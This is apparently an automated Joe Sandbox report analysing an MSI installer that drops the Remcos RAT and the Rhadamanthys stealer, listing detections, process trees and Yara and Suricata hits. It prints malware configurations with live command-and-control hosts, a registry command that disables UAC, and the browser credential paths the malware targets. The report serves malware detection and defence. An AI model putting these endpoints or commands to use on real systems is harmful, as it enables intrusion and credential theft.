Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wE1inOhJA5.msi

Overview

General Information

Sample name:wE1inOhJA5.msi
renamed because original name is a hash value
Original sample name:ff389718792f877fbdabe5cb02a1b3d5de5be988f9b5690250ffdf3409f04000.msi
Analysis ID:1560070
MD5:7c26877fcd894cc1355f2a31a551243c
SHA1:80104216da4cd3449eabf0e0de2bb3a5b2de85ca
SHA256:ff389718792f877fbdabe5cb02a1b3d5de5be988f9b5690250ffdf3409f04000
Tags:EnviaoloLLCmsiuser-JAMESWT_MHT
Infos:

Detection

Remcos, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RHADAMANTHYS Stealer
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious MsiExec Embedding Parent
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7548 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\wE1inOhJA5.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7632 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7708 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E1280F90D0867DD413F7EEEF5D19EFB6 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • icacls.exe (PID: 7760 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • expand.exe (PID: 7820 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
        • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • task.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
        • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 8076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 976 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cmd.exe (PID: 5996 cmdline: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 6848 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • task.exe (PID: 6316 cmdline: "task.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
      • task.exe (PID: 716 cmdline: C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\gifwhgt" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
      • task.exe (PID: 7340 cmdline: C:\Users\user\task.exe MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
        • svchost.exe (PID: 2148 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • svchost.exe (PID: 2968 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • chrome.exe (PID: 400 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chrFE01.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/6c77fc35" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
              • chrome.exe (PID: 7824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2376,i,16818295695986717264,7118115118329945779,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • msedge.exe (PID: 4212 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6BC.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/32916e99" MD5: 69222B8101B0601CC6663F8381E7E00F)
              • msedge.exe (PID: 6340 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2100,i,4541570122865520646,14461282582081406380,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
            • wmplayer.exe (PID: 2240 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)
              • dllhost.exe (PID: 1872 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • task.exe (PID: 7396 cmdline: C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\jckohyeeyyu" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
      • task.exe (PID: 7472 cmdline: C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\tfphirpfmgmayj" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
  • cmd.exe (PID: 1760 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • task.exe (PID: 1272 cmdline: "task.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txna"}

Threatname: Remcos

{"Host:Port:Password": ["rm.anonbaba.net:3393:1"], "Assigned name": "zp", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RNN6CM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000001F.00000003.1672134784.0000000003480000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            22.2.task.exe.255066b.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              22.2.task.exe.255066b.2.unpackREMCOS_RAT_variantsunknownunknown
              • 0x5f87c:$str_a1: C:\Windows\System32\cmd.exe
              • 0x5f7f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x5f7f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x5fce8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x5f8dc:$str_b2: Executing file:
              • 0x60604:$str_b3: GetDirectListeningPort
              • 0x5f904:$str_b9: Downloaded file:
              • 0x5f8f0:$str_b10: Downloading file:
              • 0x5f994:$str_b12: Failed to upload file:
              • 0x605cc:$str_b13: StartForward
              • 0x605ec:$str_b14: StopForward
              • 0x5f984:$str_b18: Uploaded file:
              • 0x5f944:$str_b19: Unable to delete:
              • 0x5fe21:$str_c0: [Firefox StoredLogins not found]
              • 0x5fd55:$str_c2: [Chrome StoredLogins found, cleared!]
              • 0x5fd31:$str_c3: [Chrome StoredLogins not found]
              • 0x5fe48:$str_c6: \logins.json
              • 0x5fdd1:$str_c7: [Chrome Cookies found, cleared!]
              • 0x5fe89:$str_c8: [Firefox Cookies not found]
              • 0x5fdb5:$str_c9: [Chrome Cookies not found]
              • 0x5feb9:$str_c10: [Firefox cookies found, cleared!]
              22.2.task.exe.255066b.2.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                22.2.task.exe.255066b.2.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x6107c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x60ff8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x60ff8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x614e8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x610dc:$str_b2: Executing file:
                • 0x61e04:$str_b3: GetDirectListeningPort
                • 0x61104:$str_b9: Downloaded file:
                • 0x610f0:$str_b10: Downloading file:
                • 0x61194:$str_b12: Failed to upload file:
                • 0x61dcc:$str_b13: StartForward
                • 0x61dec:$str_b14: StopForward
                • 0x61184:$str_b18: Uploaded file:
                • 0x61144:$str_b19: Unable to delete:
                • 0x61621:$str_c0: [Firefox StoredLogins not found]
                • 0x61555:$str_c2: [Chrome StoredLogins found, cleared!]
                • 0x61531:$str_c3: [Chrome StoredLogins not found]
                • 0x61648:$str_c6: \logins.json
                • 0x615d1:$str_c7: [Chrome Cookies found, cleared!]
                • 0x61689:$str_c8: [Firefox Cookies not found]
                • 0x615b5:$str_c9: [Chrome Cookies not found]
                • 0x616b9:$str_c10: [Firefox cookies found, cleared!]
                30.2.task.exe.6066b.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  Click to see the 14 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\apps.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe, ProcessId: 7880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\apps
                  Sigma detected: Dllhost Internet Connection
                  Source: Network ConnectionAuthor: bartblaze: Data: DesusertionIp: 179.43.171.196, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 1872, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49740
                  Sigma detected: Suspicious MsiExec Embedding Parent
                  Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files", CommandLine: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding E1280F90D0867DD413F7EEEF5D19EFB6, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7708, ParentProcessName: msiexec.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files", ProcessId: 5996, ProcessName: cmd.exe
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\task.exe, ParentImage: C:\Users\user\task.exe, ParentProcessId: 7340, ParentProcessName: task.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 2148, ProcessName: svchost.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\task.exe, ParentImage: C:\Users\user\task.exe, ParentProcessId: 7340, ParentProcessName: task.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 2148, ProcessName: svchost.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-21T11:26:52.782197+010020365941Malware Command and Control Activity Detected192.168.2.949713179.43.171.1973393TCP
                  2024-11-21T11:26:55.194507+010020365941Malware Command and Control Activity Detected192.168.2.949715179.43.171.1973393TCP
                  2024-11-21T11:26:55.194578+010020365941Malware Command and Control Activity Detected192.168.2.949714179.43.171.1973393TCP
                  2024-11-21T11:26:55.391739+010020365941Malware Command and Control Activity Detected192.168.2.949716179.43.171.1973393TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-21T11:27:25.180334+010028548242Potentially Bad Traffic179.43.171.1965982192.168.2.949733TCP
                  2024-11-21T11:27:37.095856+010028548242Potentially Bad Traffic179.43.171.1965982192.168.2.949739TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-21T11:26:56.599190+010028033043Unknown Traffic192.168.2.949717178.237.33.5080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-21T11:27:04.162434+010028548021Domain Observed Used for C2 Detected179.43.171.1965982192.168.2.949718TCP
                  2024-11-21T11:27:25.180334+010028548021Domain Observed Used for C2 Detected179.43.171.1965982192.168.2.949733TCP
                  2024-11-21T11:27:37.095856+010028548021Domain Observed Used for C2 Detected179.43.171.1965982192.168.2.949739TCP
                  2024-11-21T11:27:44.401092+010028548021Domain Observed Used for C2 Detected179.43.171.196443192.168.2.949740TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: rm.anonbaba.netAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\bce5c9c7fb0eb5498f5eb0ff4df1bd89.tmpAvira: detection malicious, Label: BAT/Runner.wekvp
                  Source: C:\Users\user\apps.batAvira: detection malicious, Label: BAT/Runner.wekvp
                  Found malware configuration
                  Source: 00000016.00000002.4490232230.00000000007BE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["rm.anonbaba.net:3393:1"], "Assigned name": "zp", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RNN6CM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Source: 22.3.task.exe.3b9dcbc.66.raw.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txna"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\75aedfde5bde214c9f1dda9d9e9a381f.tmpReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\87377860be1e204a95d069480a67ac12.tmpReversingLabs: Detection: 66%
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\g2m.dll (copy)ReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\your_package_name.dll (copy)ReversingLabs: Detection: 66%
                  Source: C:\Users\user\g2m.dllReversingLabs: Detection: 28%
                  Multi AV Scanner detection for submitted file
                  Source: wE1inOhJA5.msiReversingLabs: Detection: 44%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 22.2.task.exe.255066b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.task.exe.255066b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.6066b.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.task.exe.60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.120000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.6066b.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.4490232230.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.4483930249.0000000000176000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 6316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 1272, type: MEMORYSTR
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                  Source: C:\Users\user\task.exeCode function: 22_2_00091181 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,22_2_00091181
                  Source: C:\Users\user\task.exeCode function: 22_2_00066AFD CryptUnprotectData,LoadLibraryA,GetProcAddress,22_2_00066AFD
                  Source: C:\Users\user\task.exeCode function: 24_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,24_2_00404423
                  Source: task.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
                  Source: unknownHTTPS traffic detected: 179.43.171.196:443 -> 192.168.2.9:49740 version: TLS 1.2
                  Source: Binary string: your_package_name.pdbG source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp, task.exe, 00000008.00000003.1472143930.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp, task.exe, 0000001E.00000002.4491311882.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: wkernel32.pdb source: task.exe, 00000019.00000003.1667788844.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1667935272.0000000002C70000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676696250.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676535563.0000000005430000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1572618363.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wkernelbase.pdb source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: task.exe, 00000019.00000003.1664725236.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1665323555.0000000002D40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675135210.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675381954.0000000005620000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: your_package_name.pdbI source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: task.exe, 00000019.00000003.1665989629.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1666587570.0000000002CF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675802717.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676138788.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: task.exe, 00000019.00000003.1664725236.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1665323555.0000000002D40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675135210.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675381954.0000000005620000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: task.exe, 00000019.00000003.1665989629.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1666587570.0000000002CF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675802717.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676138788.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
